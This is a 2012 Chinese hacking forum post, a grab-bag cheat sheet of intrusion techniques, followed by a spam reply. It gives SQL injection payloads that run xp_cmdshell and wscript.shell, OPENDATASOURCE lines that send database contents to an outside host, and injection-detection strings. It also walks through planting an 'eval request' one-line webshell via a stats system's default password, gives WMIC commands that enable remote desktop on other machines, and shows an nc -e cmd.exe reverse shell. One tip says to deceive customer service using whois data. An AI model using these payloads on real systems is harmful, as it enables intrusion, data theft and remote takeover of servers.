找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3224|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
! g0 v3 [9 c) m  k) S/ Z1 I/ {
" V( @% B+ Y" ^2 a" V# l, \7 S: r1 e7 R
SA点数据库分离搞法+语句:5 h7 I, s7 Z3 j, s

0 E1 e3 |3 u1 v( c1 \注射点不显错,执行下面三条语句页面都返回正常。
  p% z: X. _$ y9 w8 Kand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
+ v$ q$ x1 \, d" x! land 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')3 K) {2 O) G% P
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')$ b$ Y# v' v! k/ r, H" I
可以列目录,判断系统为2000,web与数据库分离8 G( Y$ d9 P" m! e: ]7 m
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
2 x4 h1 P4 B- G0 ]+ c- A5 r" D在注射点上执行
" X8 P' H4 [: f9 c8 j& V; _declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--6 I- [+ p! {) m5 c4 @  w/ b
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
; b8 ^* E1 H6 i5 N) `  m4 U+ J还有我用NC监听得其他端口都没有得到IP。$ e& P: X. d" R7 e4 K5 \8 g- t
4 z, b  ?" K- C4 w7 M& O3 U% i
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
7 N0 ?  Y& k; {! w( {; P'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
) E2 }# T) s, I  z$ d
2 N" G5 x2 U# z; V;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--2 e6 G; J$ r' c

( L$ x$ l. d4 F/ V现在就猜想是不是数据库是内网而且不能连外网。
, g3 S! H$ ^0 s& F2 W
# i9 D5 w) a$ J" O; i% {
, z7 `  g+ U9 B$ ?5 \6 M: Oaccess导出txt文本代码2 I# U+ q1 W( _) M& [$ ?
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin7 a, N5 j$ j! r9 W/ v

! P0 j. Q  S. i0 V: p9 |% V
/ s, i- j- C1 F( b
/ N5 Q- [: c7 n# ]0 v2 V自动跳转到指定网站代码头
% k: i# N# h1 y6 `0 J; |) O8 j<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
; F* X: q! R( K& \9 I( t1 p9 o* R( u. v; S  Z3 o/ l: U

4 H" T4 H4 V- y) @* d% }入侵java or jsp站点时默认配置文件路径:- ~9 ^% C' r0 i" c, S
\web-inf\web.xml1 N; _+ {: z2 ~/ H! y. T
tomcat下的配置文件位置:
* K5 Q/ f3 {0 ~6 g\conf\server.xml            (前面加上tomcat路径)! U: f8 i9 {3 N$ C
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
8 r3 ^% u, L( h1 V: w  |+ j8 z: R$ n

/ v: L: P% m: u! u, R+ Z- O2 q, Q2 r: _
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:3 d6 z, _5 S" N) a  S* c. {
-1%23
& f2 Q, n7 j9 R; m>
: G+ G$ \! e3 l0 g  N<- x9 N2 ~$ O2 \* U1 C
1'+or+'1'='1- ^6 H" U1 O0 Q" K
id=8%bf+ W( G  v5 X$ g

+ @5 @' M0 u" e2 k, y全新注入点检测试法:
# T9 j/ n; }2 m0 g4 x( r: O/ p6 u在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。# R/ u  g; V+ `& C
& i) w/ b" r6 Q5 o- k
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
& r' _& y! J2 U. y/ ]) ~7 ]! |7 s9 W8 v0 m0 \! Y, i
搜索型注入判断方法:
( M, g3 s, S/ `! y北京%' and '1'='1' and '%'='
3 H& ]  O5 r2 G- o北京%' and '1'='2' and '%'='8 M/ g! ?, g0 T& t3 H8 X7 {2 W& R

/ \3 x; F  {8 v. Z% f2 z; D: U# t/ O9 K: d- q/ V
COOKIES注入:5 ^$ l+ d& k& k. b3 P

8 G- f* y7 `5 @: n6 z2 cjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
. K$ D  I7 d. G+ L+ q0 ^, O8 v
$ f# }. |2 F6 M7 c4 d8 N7 J2000专业版查看本地登录用户命令:
+ h) Z. i" T+ a! ?9 rnet config workstation2 C& M( x, W$ _
4 L/ s' M- l: ~/ @

; T4 F8 Q! ?/ R6 t8 `" f; W2003下查看ipsec配置和默认防火墙配置命令:
8 m! z2 N" R7 [( k2 _$ t7 I8 i) nnetsh firewall show config
: ?' Z0 d1 ^& N" g' cnetsh ipsec static show all$ b/ ?% m7 o1 E. Y/ L
  Q& E6 q# d/ h# T, E9 V7 U& \0 D
不指派指定策略命令:
5 W( i7 @# X7 x( Q" a) Inetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
+ f. Z4 N3 e+ |+ [netsh ipsec static show policy all  显示策略名
/ e" ]9 z4 }+ [; l( Y& R2 l! c2 ]4 G8 Q% W' n, X
, ?* n1 @& h! j6 Y) c
猜管理员后台小技巧:$ I) O% j8 k- L
admin/left.asp ' a' c' T% m* `$ p/ ^0 V5 O
admin/main.asp
7 n; \1 \. Z( ~# Q6 D2 p3 xadmin/top.asp
0 r7 V# {) w! L# c# {admin/admin.asp 3 Y1 b* |9 L; O6 i5 i
会现出菜单导航,然后迅雷下载全部链接  D( v: ?1 W0 j+ v. N

1 A. f' \' F; k. w" T
& T1 o. q! v- h3 i2 |. k社会工程学:
  C# H9 x9 S) l4 e4 q+ W7 C: k用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
- n4 S1 ~; Z$ o9 y然后去骗客服
; i. x0 z/ X1 V0 w0 q( W# U0 b8 L
5 {7 {$ I/ m* X$ ?- v& A
4 D% ]5 `8 e* v7 D统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
! s2 e! ]/ e$ z) A$ ^查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
. y0 W' ^  s5 t  R) n  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
: O7 D# R; c" Q3 g/ ~3 N+ U, s& Y
7 ^% H0 H- M2 B" A% G
  U, w& m' w( X3 q) p% T6 A. d5 f. G( m) n/ ^
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)) E- ~8 r4 t  _
3 J) w. ^" t% I0 d( `; K7 X

8 M9 l( W. t1 e: i& T8 |' m2 Q: s3 q/ i1 z# K+ k
CMD加密注册表位置9 j  ?+ n# L  @
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor$ l6 k* Z: `; u( m$ x
AutoRun
8 q0 A! |, x, R/ h/ |9 l2 c$ c! K5 q7 o0 {  s- w& J6 ]. v! L
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor- E7 M4 ~2 O1 \+ j
AutoRun  H/ ^6 w" ?( p! o) y* k$ \
! z. K5 o+ w1 G6 e( k

" G1 E) o6 Z+ h0 x2 f/ w7 B在找注入时搜索Hidden,把他改成test) q7 W1 E6 D, a1 |; Y9 b# C8 {

; C# Z4 }8 n/ l3 [' l' K: h7 _$ x% r, I5 k9 s5 s9 J( v7 U

) u; @3 {( c: l* c5 d5 jmstsc /v:IP /console ( n1 p  r' `- w3 {: j) _
! ]! V9 c5 D6 d5 V+ n6 n$ M

% c  y( z: @. Y  J; `$ I+ D. w一句话开3389:
7 ]9 [9 |" B5 Y: k  V/ B1 x' k
6 u. f/ g% ~7 B: g" \( ^5 a最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  / V' o% l9 k1 m$ [9 _
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
4 l6 G6 }5 w$ h, U% _  F) i# i' R3 Z# z* h/ E$ R

0 L  U) {8 l( j4 v9 Y9 V知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:" _4 _: l* ~7 L! ^& m
Insert into admin(user,pwd) values('test','test'). J% d. b: O$ X) T) X* a
# z8 m) X0 ?1 ~& _) |8 c

0 d% {( W# a$ ONC反弹
6 L/ ]" K; l0 ~% B% Z1 }7 y% e先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   1 Z% E. W* j8 y% `4 k
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)$ N: V4 ~3 Z$ C

- m) C  i5 G" M% V) f6 g/ \
  d$ ]6 D6 w* H) }9 D* Z" X3 n9 P; C在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
1 W7 y- R+ _' A3 m, w+ h
( a. a% c3 l8 v# b有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录; w9 r$ p" G, \1 K
例如:! k( }0 l1 f! _' X
subst k: d:\www\ 用d盘www目录替代k盘
! r. }& I) S, F+ B% N: Esubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表